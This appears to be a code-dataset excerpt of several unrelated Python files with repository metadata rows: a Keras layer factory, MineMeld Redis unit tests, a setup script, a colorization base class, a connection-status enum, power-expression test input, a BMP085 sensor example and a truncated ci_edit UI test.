| 27.792453 | 88 | 0.680244 | 191 | 1,473 | 5.089005 | 0.549738 | 0.037037 | 0.057613 | 0.078189 | 0.319959 | 0.30144 | 0.22428 | 0.22428 | 0 | 0 | 0 | 0.000881 | 0.229464 | 1,473 | 52 | 89 | 28.326923 | 0.855507 | 0.775289 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
948ea6a0b5c056f9fe9ef6242bd4fbe718ac42ab | 6,142 | py | Python | veqtor_keras/blocks/layer_factory.py | veqtor/veqtor_keras | 303f81b7c6aaa7962b288541275fe7ea618804b9 | [
"MIT"
] | 1 | 2020-08-07T14:47:16.000Z | 2020-08-07T14:47:16.000Z | veqtor_keras/blocks/layer_factory.py | veqtor/veqtor_keras | 303f81b7c6aaa7962b288541275fe7ea618804b9 | [
"MIT"
] | null | null | null | veqtor_keras/blocks/layer_factory.py | veqtor/veqtor_keras | 303f81b7c6aaa7962b288541275fe7ea618804b9 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from tensorflow.keras import layers as tfkl

from veqtor_keras import layers as vqkl


def get_1d_layer(type,
                 output_dim,
                 output_mul,
                 context_size,
                 stride=1,
                 dilation=1,
                 grouped=False,
                 group_size=1,
                 padding='same',
                 activation=None,
                 use_bias=True,
                 kernel_initializer='glorot_uniform',
                 bias_initializer='zeros',
                 kernel_regularizer=None,
                 bias_regularizer=None,
                 activity_regularizer=None,
                 kernel_constraint=None,
                 bias_constraint=None,
                 **kwargs):
    if type.lower() == 'TimeDelayLayer1D'.lower():
        # Time-delay layers have no causal mode; fall back to 'same' padding.
        if padding == 'causal':
            padding = 'same'
        return vqkl.time_delay_layers.TimeDelayLayer1D(
            output_dim=output_dim,
            context_size=context_size,
            stride=stride,
            dilation=dilation,
            padding=padding,
            activation=activation,
            use_bias=use_bias,
            kernel_initializer=kernel_initializer,
            bias_initializer=bias_initializer,
            kernel_regularizer=kernel_regularizer,
            bias_regularizer=bias_regularizer,
            activity_regularizer=activity_regularizer,
            kernel_constraint=kernel_constraint,
            bias_constraint=bias_constraint,
            **kwargs)
    elif type.lower() == 'DepthGroupwiseTimeDelayLayer1D'.lower():
        if padding == 'causal':
            padding = 'same'
        return vqkl.time_delay_layers.DepthGroupwiseTimeDelayLayer1D(
            output_mul=output_mul,
            context_size=context_size,
            stride=stride,
            dilation=dilation,
            padding=padding,
            activation=activation,
            use_bias=use_bias,
            grouped=grouped,
            group_size=group_size,
            kernel_initializer=kernel_initializer,
            bias_initializer=bias_initializer,
            kernel_regularizer=kernel_regularizer,
            bias_regularizer=bias_regularizer,
            activity_regularizer=activity_regularizer,
            kernel_constraint=kernel_constraint,
            bias_constraint=bias_constraint,
            **kwargs)
    elif type.lower() in ['Convolution1D'.lower(), 'Conv1D'.lower()]:
        # Keras convolution layers accept no grouped/group_size arguments,
        # so those options are not forwarded here.
        return tfkl.Convolution1D(
            filters=output_dim,
            kernel_size=context_size,
            strides=stride,
            dilation_rate=dilation,
            padding=padding,
            activation=activation,
            use_bias=use_bias,
            kernel_initializer=kernel_initializer,
            bias_initializer=bias_initializer,
            kernel_regularizer=kernel_regularizer,
            bias_regularizer=bias_regularizer,
            activity_regularizer=activity_regularizer,
            kernel_constraint=kernel_constraint,
            bias_constraint=bias_constraint,
            **kwargs)
    elif type.lower() in ['SeparableConv1D'.lower(), 'SeparableConvolution1D'.lower()]:
        return tfkl.SeparableConvolution1D(
            filters=output_dim,
            kernel_size=context_size,
            strides=stride,
            dilation_rate=dilation,
            padding=padding,
            activation=activation,
            use_bias=use_bias,
            kernel_initializer=kernel_initializer,
            bias_initializer=bias_initializer,
            kernel_regularizer=kernel_regularizer,
            bias_regularizer=bias_regularizer,
            activity_regularizer=activity_regularizer,
            kernel_constraint=kernel_constraint,
            bias_constraint=bias_constraint,
            **kwargs)
    raise ValueError('Unknown 1D layer type: {}'.format(type))
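The repeated `type.lower() == 'Name'.lower()` comparisons can also be expressed as an alias registry, which keeps each constructor next to the names that select it and makes the "unknown type" failure explicit. A runnable sketch with the Keras/veqtor constructors stubbed out (the registry contents and function name are illustrative):

```python
def make_1d_layer(kind, **kwargs):
    """Alias-registry version of the if/elif dispatch above."""
    registry = {
        ('timedelaylayer1d',): lambda **kw: ('TimeDelayLayer1D', kw),
        ('conv1d', 'convolution1d'): lambda **kw: ('Conv1D', kw),
        ('separableconv1d', 'separableconvolution1d'):
            lambda **kw: ('SeparableConv1D', kw),
    }
    key = kind.lower()
    for aliases, build in registry.items():
        if key in aliases:
            return build(**kwargs)
    raise ValueError('Unknown 1D layer type: %s' % kind)


name, params = make_1d_layer('Convolution1D', filters=64, kernel_size=3)
print(name, params)
```

In the real factory each stub would be replaced by the corresponding `tfkl`/`vqkl` constructor, with the argument remapping (`output_dim` → `filters`, `context_size` → `kernel_size`) done per entry.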
| 62.040404 | 111 | 0.395799 | 346 | 6,142 | 6.679191 | 0.182081 | 0.027261 | 0.090004 | 0.055387 | 0.697101 | 0.697101 | 0.697101 | 0.697101 | 0.697101 | 0.697101 | 0 | 0.005199 | 0.561543 | 6,142 | 98 | 112 | 62.673469 | 0.852952 | 0 | 0 | 0.659574 | 0 | 0 | 0.023608 | 0.008466 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010638 | false | 0 | 0.053191 | 0 | 0.106383 | 0.010638 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94c52d6aae8dd2386cac52f2ba9082ee21f859b2 | 8,528 | py | Python | tests/test_ft_redis.py | zul126/minemeld-core | 2eb9b9bfd7654aee57aabd5fb280d4e89a438daf | [
"Apache-2.0"
] | 1 | 2021-01-02T07:25:04.000Z | 2021-01-02T07:25:04.000Z | tests/test_ft_redis.py | zul126/minemeld-core | 2eb9b9bfd7654aee57aabd5fb280d4e89a438daf | [
"Apache-2.0"
] | null | null | null | tests/test_ft_redis.py | zul126/minemeld-core | 2eb9b9bfd7654aee57aabd5fb280d4e89a438daf | [
"Apache-2.0"
] | 1 | 2019-03-14T06:52:52.000Z | 2019-03-14T06:52:52.000Z | # Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""FT Redis tests

Unit tests for minemeld.ft.redis
"""

import gevent.monkey
gevent.monkey.patch_all(thread=False, select=False)

import unittest
import mock
import redis
import time

import minemeld.ft.redis

FTNAME = 'testft-%d' % int(time.time())


class MineMeldFTRedisTests(unittest.TestCase):
    def setUp(self):
        SR = redis.StrictRedis()
        SR.delete(FTNAME)

    def tearDown(self):
        SR = redis.StrictRedis()
        SR.delete(FTNAME)

    def test_init(self):
        config = {}
        chassis = mock.Mock()

        b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)

        self.assertEqual(b.name, FTNAME)
        self.assertEqual(b.chassis, chassis)
        self.assertEqual(b.config, config)
        self.assertItemsEqual(b.inputs, [])
        self.assertEqual(b.output, None)
        self.assertEqual(b.redis_skey, FTNAME)
        self.assertNotEqual(b.SR, None)
        self.assertEqual(b.redis_host, '127.0.0.1')
        self.assertEqual(b.redis_port, 6379)
        self.assertEqual(b.redis_password, None)
        self.assertEqual(b.redis_db, 0)

    def test_connect_io(self):
        config = {}
        chassis = mock.Mock()
        chassis.request_sub_channel.return_value = None
        ochannel = mock.Mock()
        chassis.request_pub_channel.return_value = ochannel
        chassis.request_rpc_channel.return_value = None

        b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)

        inputs = ['a', 'b', 'c']
        output = True

        b.connect(inputs, output)
        b.mgmtbus_initialize()
        self.assertItemsEqual(b.inputs, inputs)
        self.assertEqual(b.output, None)

        icalls = []
        for i in inputs:
            icalls.append(
                mock.call(
                    FTNAME, b, i,
                    allowed_methods=[
                        'update', 'withdraw', 'checkpoint'
                    ]
                )
            )
        chassis.request_sub_channel.assert_has_calls(
            icalls,
            any_order=True
        )
        chassis.request_rpc_channel.assert_called_once_with(
            FTNAME,
            b,
            allowed_methods=[
                'update',
                'withdraw',
                'checkpoint',
                'get',
                'get_all',
                'get_range',
                'length'
            ]
        )
        chassis.request_pub_channel.assert_not_called()

    def test_uw(self):
        config = {}
        chassis = mock.Mock()
        chassis.request_sub_channel.return_value = None
        ochannel = mock.Mock()
        chassis.request_pub_channel.return_value = ochannel
        chassis.request_rpc_channel.return_value = None
        rpcmock = mock.Mock()
        rpcmock.get.return_value = {'error': None, 'result': 'OK'}
        chassis.send_rpc.return_value = rpcmock

        b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)

        inputs = ['a', 'b', 'c']
        output = False

        b.connect(inputs, output)
        b.mgmtbus_initialize()
        b.start()
        time.sleep(1)

        SR = redis.StrictRedis()

        b.filtered_update('a', indicator='testi', value={'test': 'v'})
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 1)
        self.assertIn('testi', sm)

        b.filtered_withdraw('a', indicator='testi')
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 0)

        b.stop()
        self.assertNotEqual(b.SR, None)

    def test_stats(self):
        config = {}
        chassis = mock.Mock()
        chassis.request_sub_channel.return_value = None
        ochannel = mock.Mock()
        chassis.request_pub_channel.return_value = ochannel
        chassis.request_rpc_channel.return_value = None
        rpcmock = mock.Mock()
        rpcmock.get.return_value = {'error': None, 'result': 'OK'}
        chassis.send_rpc.return_value = rpcmock

        b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)

        inputs = ['a', 'b', 'c']
        output = False

        b.connect(inputs, output)
        b.mgmtbus_reset()
        b.start()
        time.sleep(1)

        b.filtered_update('a', indicator='testi', value={'test': 'v'})
        self.assertEqual(b.length(), 1)
        status = b.mgmtbus_status()
        self.assertEqual(status['statistics']['added'], 1)

        b.filtered_update('a', indicator='testi', value={'test': 'v2'})
        self.assertEqual(b.length(), 1)
        status = b.mgmtbus_status()
        self.assertEqual(status['statistics']['added'], 1)
        self.assertEqual(status['statistics']['removed'], 0)

        b.filtered_withdraw('a', indicator='testi')
        self.assertEqual(b.length(), 0)
        status = b.mgmtbus_status()
        self.assertEqual(status['statistics']['removed'], 1)

        b.stop()

    def test_store_value(self):
        config = {'store_value': True}
        chassis = mock.Mock()
        chassis.request_sub_channel.return_value = None
        ochannel = mock.Mock()
        chassis.request_pub_channel.return_value = ochannel
        chassis.request_rpc_channel.return_value = None
        rpcmock = mock.Mock()
        rpcmock.get.return_value = {'error': None, 'result': 'OK'}
        chassis.send_rpc.return_value = rpcmock

        b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)

        inputs = ['a', 'b', 'c']
        output = False

        b.connect(inputs, output)
        b.mgmtbus_reset()
        b.start()
        time.sleep(1)

        SR = redis.StrictRedis()

        b.filtered_update('a', indicator='testi', value={'test': 'v'})
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 1)
        self.assertIn('testi', sm)
        sm = SR.hlen(FTNAME+'.value')
        self.assertEqual(sm, 1)

        b.filtered_withdraw('a', indicator='testi')
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 0)
        sm = SR.hlen(FTNAME+'.value')
        self.assertEqual(sm, 0)

        b.stop()
        self.assertNotEqual(b.SR, None)

    def test_store_value_overflow(self):
        config = {'store_value': True}
        chassis = mock.Mock()
        chassis.request_sub_channel.return_value = None
        ochannel = mock.Mock()
        chassis.request_pub_channel.return_value = ochannel
        chassis.request_rpc_channel.return_value = None
        rpcmock = mock.Mock()
        rpcmock.get.return_value = {'error': None, 'result': 'OK'}
        chassis.send_rpc.return_value = rpcmock

        b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)
        b.max_entries = 1

        inputs = ['a', 'b', 'c']
        output = False

        b.connect(inputs, output)
        b.mgmtbus_reset()
        b.start()
        time.sleep(1)

        SR = redis.StrictRedis()

        b.filtered_update('a', indicator='testi', value={'test': 'v'})
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 1)
        self.assertIn('testi', sm)
        sm = SR.hlen(FTNAME+'.value')
        self.assertEqual(sm, 1)

        b.filtered_update('a', indicator='testio', value={'test': 'v'})
        self.assertEqual(b.statistics['drop.overflow'], 1)
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 1)
        self.assertIn('testi', sm)
        sm = SR.hlen(FTNAME+'.value')
        self.assertEqual(sm, 1)

        b.filtered_withdraw('a', indicator='testi')
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 0)
        sm = SR.hlen(FTNAME+'.value')
        self.assertEqual(sm, 0)

        b.filtered_update('a', indicator='testio', value={'test': 'v'})
        self.assertEqual(b.statistics['drop.overflow'], 1)
        sm = SR.zrange(FTNAME, 0, -1)
        self.assertEqual(len(sm), 1)
        self.assertIn('testio', sm)
        sm = SR.hlen(FTNAME+'.value')
        self.assertEqual(sm, 1)

        b.stop()
        self.assertNotEqual(b.SR, None)
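`test_store_value_overflow` exercises a `max_entries` cap: an update for a *new* indicator when the set is already full is dropped and counted under `drop.overflow`, while a withdrawal frees a slot so a later update succeeds. A stripped-down, Redis-free sketch of that rule (class and attribute names are illustrative, not the minemeld API):

```python
class CappedSet:
    """Capped indicator store: overflowing adds are dropped and counted."""
    def __init__(self, max_entries):
        self.max_entries = max_entries
        self.entries = {}
        self.drop_overflow = 0

    def update(self, indicator, value):
        # updates to an existing indicator always succeed; only new
        # indicators can overflow the cap
        if indicator not in self.entries and len(self.entries) >= self.max_entries:
            self.drop_overflow += 1
            return
        self.entries[indicator] = value

    def withdraw(self, indicator):
        self.entries.pop(indicator, None)


s = CappedSet(max_entries=1)
s.update('testi', {'test': 'v'})
s.update('testio', {'test': 'v'})   # dropped: the set is full
s.withdraw('testi')
s.update('testio', {'test': 'v'})   # accepted: a slot was freed
```

The same sequence of operations mirrors the assertions in the test above: one overflow drop, then exactly one surviving entry.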
| 29.714286 | 75 | 0.585366 | 1,009 | 8,528 | 4.835481 | 0.177403 | 0.101455 | 0.04919 | 0.045091 | 0.744005 | 0.695224 | 0.675548 | 0.659766 | 0.624513 | 0.608321 | 0 | 0.010475 | 0.283537 | 8,528 | 286 | 76 | 29.818182 | 0.788052 | 0.072702 | 0 | 0.710145 | 0 | 0 | 0.055267 | 0 | 0 | 0 | 0 | 0 | 0.227053 | 1 | 0.038647 | false | 0.004831 | 0.028986 | 0 | 0.072464 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94c6f00f1e90e2bb704b2f6875335a7a2ff04502 | 871 | py | Python | setup.py | carlmontanari/sea_nwautomation_meetup_oct_2019 | 98da0fd40e1ba5733f79ef1f2e14276bbf439f00 | [
"MIT"
] | 3 | 2019-11-25T06:47:43.000Z | 2021-05-29T13:27:06.000Z | setup.py | carlmontanari/sea_nwautomation_meetup_oct_2019 | 98da0fd40e1ba5733f79ef1f2e14276bbf439f00 | [
"MIT"
] | null | null | null | setup.py | carlmontanari/sea_nwautomation_meetup_oct_2019 | 98da0fd40e1ba5733f79ef1f2e14276bbf439f00 | [
"MIT"
] | 2 | 2020-03-11T07:21:19.000Z | 2021-05-29T13:27:07.000Z | #!/usr/bin/env python
import setuptools

__author__ = "Carl Montanari"

with open("README.md", "r") as f:
    README = f.read()

setuptools.setup(
    name="sea_nwautomation_meetup_oct_2019",
    version="2019.09.15",
    author=__author__,
    author_email="carl.r.montanari@gmail.com",
    description="Check out some cool nornir stuff!",
    long_description=README,
    long_description_content_type="text/markdown",
    packages=setuptools.find_packages(),
    install_requires=[],
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Operating System :: POSIX :: Linux",
        "Operating System :: MacOS",
    ],
    python_requires=">=3.6",
)
| 28.096774 | 52 | 0.639495 | 98 | 871 | 5.479592 | 0.632653 | 0.141527 | 0.18622 | 0.193669 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030747 | 0.215844 | 871 | 30 | 53 | 29.033333 | 0.75549 | 0.022962 | 0 | 0 | 0 | 0 | 0.454118 | 0.068235 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94d1a5ad4a94c8f31389bab09def22acb7245f64 | 744 | py | Python | comicolorization_sr/colorization_task/base.py | DwangoMediaVillage/Comicolorization | 98f323e78baceae0b1086f01ac51b5e8a7515abb | [
"MIT"
] | 122 | 2017-08-21T10:01:07.000Z | 2022-03-21T13:52:19.000Z | comicolorization_sr/colorization_task/base.py | DwangoMediaVillage/Comicolorization | 98f323e78baceae0b1086f01ac51b5e8a7515abb | [
"MIT"
] | 7 | 2017-10-20T15:12:13.000Z | 2022-01-30T23:04:37.000Z | comicolorization_sr/colorization_task/base.py | DwangoMediaVillage/Comicolorization | 98f323e78baceae0b1086f01ac51b5e8a7515abb | [
"MIT"
] | 26 | 2017-08-22T08:11:20.000Z | 2022-03-09T14:59:18.000Z | from abc import ABCMeta, abstractmethod
import typing

import six

from comicolorization_sr.config import Config
from comicolorization_sr.data_process import BaseDataProcess


@six.add_metaclass(ABCMeta)
class BaseColorizationTask(object):
    def __init__(self, config, load_model=True):
        # type: (Config, any) -> None
        self.config = config
        self.load_model = load_model

    @abstractmethod
    def get_input_process(self):
        # type: (any) -> BaseDataProcess
        pass

    @abstractmethod
    def get_concat_process(self):
        # type: (any) -> BaseDataProcess
        pass

    @abstractmethod
    def get_colorizer(self):
        # type: (any) -> typing.Callable[[typing.Any, bool], typing.Any]
        pass
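`BaseColorizationTask` uses `six.add_metaclass(ABCMeta)` so that both Python 2 and 3 refuse to instantiate the class until every `@abstractmethod` is overridden. On Python 3 alone the same contract is written with `abc.ABC`; a minimal runnable sketch (class names here are illustrative, not from the project):

```python
from abc import ABC, abstractmethod


class BaseTask(ABC):
    """Python-3-only stand-in for the six/ABCMeta pattern above."""

    @abstractmethod
    def get_input_process(self):
        ...


class GrayscaleTask(BaseTask):
    def get_input_process(self):
        return 'to-grayscale'


task = GrayscaleTask()   # fine: the abstract method is implemented
print(task.get_input_process())
```

Instantiating `BaseTask()` directly raises `TypeError`, which is exactly the guarantee the `six` decorator provides in the two-version codebase.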
| 25.655172 | 72 | 0.682796 | 83 | 744 | 5.927711 | 0.409639 | 0.054878 | 0.121951 | 0.073171 | 0.231707 | 0.231707 | 0.231707 | 0.231707 | 0.231707 | 0 | 0 | 0 | 0.228495 | 744 | 28 | 73 | 26.571429 | 0.857143 | 0.204301 | 0 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0.157895 | 0.263158 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
94d5f7b18c2143b73996eb232caf28a1df4c4d79 | 885 | py | Python | utils/gnet.py | eigenphi/gcommon | bce1ee422874fa904d90afee03fd703a06dc7a4d | [
"MIT"
] | 3 | 2021-11-09T09:43:21.000Z | 2021-12-16T18:15:43.000Z | utils/gnet.py | eigenphi/gcommon | bce1ee422874fa904d90afee03fd703a06dc7a4d | [
"MIT"
] | null | null | null | utils/gnet.py | eigenphi/gcommon | bce1ee422874fa904d90afee03fd703a06dc7a4d | [
"MIT"
] | 2 | 2022-03-10T11:24:46.000Z | 2022-03-25T06:39:17.000Z | # -*- coding: utf-8 -*-
# created: 2015-05-12
# creator: liguopeng@liguopeng.net
"""Network-related helper functions and base types."""
from enum import Enum


class ConnectionStatus(Enum):
    """All supported connection states."""
    Initialized = "initialized"
    Connected = "connected"
    Closed = "closed"
    Connecting = "connecting"
    Reconnecting = "reconnecting"
    Suspended = "suspended"
    Connection_Failed = "connection_failed"
    Closing = "closing"

    @property
    def is_connecting(self):
        return self in (self.Connecting, self.Reconnecting)

    @property
    def is_connected(self):
        return self == self.Connected

    @property
    def is_closed(self):
        return self in (self.Connection_Failed, self.Closed, self.Initialized)

    @property
    def is_closing(self):
        return self == self.Closing

    @property
    def is_suspended(self):
        return self == self.Suspended
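Exposing state predicates as properties keeps call sites readable (`status.is_connecting` instead of comparing against several members) and keeps the decision of which states count as "transient" in one place. A trimmed, runnable copy of the idea, with only a few members kept for the demonstration:

```python
from enum import Enum


class ConnectionStatus(Enum):
    """Trimmed copy of the enum above, enough to show the predicate pattern."""
    Connected = "connected"
    Connecting = "connecting"
    Reconnecting = "reconnecting"
    Closed = "closed"

    @property
    def is_connecting(self):
        # one membership test covers both transient states
        return self in (ConnectionStatus.Connecting, ConnectionStatus.Reconnecting)


status = ConnectionStatus.Reconnecting
print(status.is_connecting)
```

Referencing members through the class (`ConnectionStatus.Connecting`) rather than through `self` avoids member-of-member attribute access, which newer Python versions restrict.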
| 21.071429 | 78 | 0.653107 | 93 | 885 | 6.129032 | 0.354839 | 0.096491 | 0.114035 | 0.094737 | 0.070175 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013314 | 0.236158 | 885 | 41 | 79 | 21.585366 | 0.829882 | 0.114124 | 0 | 0.2 | 0 | 0 | 0.105058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.04 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
94d944ede215de6f719c578046e25496ee9261fd | 253 | py | Python | ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/constantfolding/data/arithmetic/in_5_powers.py | JetBrains-Research/ast-transformations | 0ab408af3275b520cc87a473f418c4b4dfcb0284 | [
"MIT"
] | 8 | 2021-01-19T21:15:54.000Z | 2022-02-23T19:16:25.000Z | ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/constantfolding/data/arithmetic/in_5_powers.py | JetBrains-Research/ast-transformations | 0ab408af3275b520cc87a473f418c4b4dfcb0284 | [
"MIT"
] | 4 | 2020-11-17T14:28:25.000Z | 2022-02-24T07:54:28.000Z | ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/constantfolding/data/arithmetic/in_5_powers.py | nbirillo/ast-transformations | 717706765a2da29087a0de768fc851698886dd65 | [
"MIT"
] | 1 | 2022-02-23T19:16:30.000Z | 2022-02-23T19:16:30.000Z | a = 2 ** 62
b = 2 ** 63
c = 0 ** 0
d = 0 ** 1
e = 1 ** 999999999
f = 1 ** 999999999999999999999999999
g = 1 ** (-1)
h = 0 ** (-1)
i = 999999999999999 ** 99999999999999999999999999999
j = 2 ** 10
k = 10 ** 10
l = 13 ** 3
m = (-3) ** 3
n = (-3) ** 4
| 12.65 | 52 | 0.490119 | 42 | 253 | 2.952381 | 0.642857 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.617978 | 0.296443 | 253 | 19 | 53 | 13.315789 | 0.078652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94e571227135c3d7295e0cda3e437b096b12fc45 | 310 | py | Python | librariesForWeatherStation/Adafruit_Python_BMP/examples/simpltetest.py | KaushikNeelichetty/IoT-Based-Weather-Station-with-Raspberry-Pi | e3dcd55395dad750f5949ba3e9ceeee4b3428f90 | [
"MIT"
] | 3 | 2021-01-04T14:41:07.000Z | 2021-04-18T23:03:07.000Z | librariesForWeatherStation/Adafruit_Python_BMP/examples/simpltetest.py | KaushikNeelichetty/IoT-Based-Weather-Station-with-Raspberry-Pi | e3dcd55395dad750f5949ba3e9ceeee4b3428f90 | [
"MIT"
] | null | null | null | librariesForWeatherStation/Adafruit_Python_BMP/examples/simpltetest.py | KaushikNeelichetty/IoT-Based-Weather-Station-with-Raspberry-Pi | e3dcd55395dad750f5949ba3e9ceeee4b3428f90 | [
"MIT"
] | 3 | 2020-05-21T02:34:15.000Z | 2022-03-31T21:20:21.000Z | import Adafruit_BMP.BMP085 as BMP085
sensor = BMP085.BMP085()
temp = '{0:0.2f}'.format(sensor.read_temperature())
pressure = '{0:0.2f}'.format(sensor.read_pressure())
altitude = '{0:0.2f}'.format(sensor.read_altitude())
seaalevelPressure = '{0:0.2f}'.format(sensor.read_sealevel_pressure())
print(type(temp))
| 34.444444 | 70 | 0.735484 | 45 | 310 | 4.933333 | 0.4 | 0.036036 | 0.072072 | 0.18018 | 0.36036 | 0.36036 | 0 | 0 | 0 | 0 | 0 | 0.083045 | 0.067742 | 310 | 8 | 71 | 38.75 | 0.685121 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94edf543cfb5d538c3d8441a1ed86778f9f7c850 | 7,643 | py | Python | app/unit_test_ui.py | cclauss/ci_edit | 5af80d643e7b16e5e3270771bdbc6b322255d460 | [
"Apache-2.0"
] | null | null | null | app/unit_test_ui.py | cclauss/ci_edit | 5af80d643e7b16e5e3270771bdbc6b322255d460 | [
"Apache-2.0"
] | null | null | null | app/unit_test_ui.py | cclauss/ci_edit | 5af80d643e7b16e5e3270771bdbc6b322255d460 | [
"Apache-2.0"
] | null | null | null | # -*- coding: latin-1 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import curses
import os
import sys

from app.curses_util import *
import app.ci_program
import app.fake_curses_testing
import app.prefs

kTestFile = u'#application_test_file_with_unlikely_file_name~'


class UiBasicsTestCases(app.fake_curses_testing.FakeCursesTestCase):
    def setUp(self):
        self.longMessage = True
        if True:
            # The buffer manager will retain the test file in RAM. Reset it.
            try:
                del sys.modules['app.buffer_manager']
                import app.buffer_manager
            except KeyError:
                pass
        if os.path.isfile(kTestFile):
            os.unlink(kTestFile)
        self.assertFalse(os.path.isfile(kTestFile))
        app.fake_curses_testing.FakeCursesTestCase.setUp(self)

    def test_logo(self):
        self.runWithTestFile(kTestFile, [
            #self.assertEqual(256, app.prefs.startup['numColors']),
            self.displayCheck(0, 0, [u" ci "]),
            self.displayCheckStyle(0, 0, 1, len(" ci "), app.prefs.color['logo']),
            CTRL_Q])

    def test_whole_screen(self):
        #self.setMovieMode(True)
        self.runWithTestFile(kTestFile, [
            self.displayCheck(0, 0, [
                u" ci . ",
                u" ",
                u" 1 ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u"New buffer | 1, 1 | 0%, 0%",
                u" ",
            ]), CTRL_Q])

    def test_resize_screen(self):
        self.runWithTestFile(kTestFile, [
